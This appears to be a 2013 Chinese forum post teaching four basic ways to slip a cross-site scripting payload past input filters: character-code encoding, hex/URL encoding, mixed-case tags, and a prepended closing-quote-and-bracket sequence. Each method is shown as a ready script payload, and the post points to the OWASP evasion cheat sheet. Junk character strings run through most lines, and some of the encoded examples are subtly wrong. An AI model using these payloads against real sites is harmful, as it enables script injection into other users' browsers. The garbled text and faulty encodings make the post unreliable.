四种超级基础的绕过方法。6 {' d6 [% z& z
1.转换为ASCII码
4 Z3 {) R) Y9 f/ N( ~ k# ^- E) N例子:原脚本为<script>alert(‘I love F4ck’)</script >
" }7 T: B: Y9 g/ I% I# a通过转换,变成:5 m; H& F- i5 t0 T0 ~) @
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>" Q% d. R6 ]3 M6 B+ U( U, {
3 \" p; s: P: ^- C8 l3 c6 H- L
2.转换为HEX(十六进制)
$ U3 [$ H8 ?. Q% J1 w$ z例子:原脚本为<script>alert(‘I love F4ck’)</script>
) Z; X$ y1 |+ j$ x通过转换,变成:
0 [6 I+ F/ I3 B% `%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
; Q1 o" ?, Z/ S' ^& b. R% x 6 B4 p1 V5 ?& D
3.转换脚本的大小写
* n: r6 [' C. T$ r f2 d6 A$ [2 B' m例子:原脚本为<script>alert(‘I love F4ck’)</script>; t+ p3 y9 V% K/ O) w( g5 Y# g- N4 P
转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>$ ?1 j, J# T* M d2 [8 @
], m* b' m# n
4.增加闭合标记”>, }7 F* D+ P. K/ @
例子:原脚本为<script>alert(‘I love F4ck’)</script>
/ L6 D) X$ ^8 N( u9 F转换为:”><script>alert(‘I love F4ck’)</script>
, `- P F* N* {" \1 h$ Y更详细绕过技术请参考此网页0 H) `; Q+ U6 A1 f* t l2 Z0 r
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
. F' [1 m4 s4 l* U& r" f
; a. T/ f( v! m2 |( I转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
支持
反对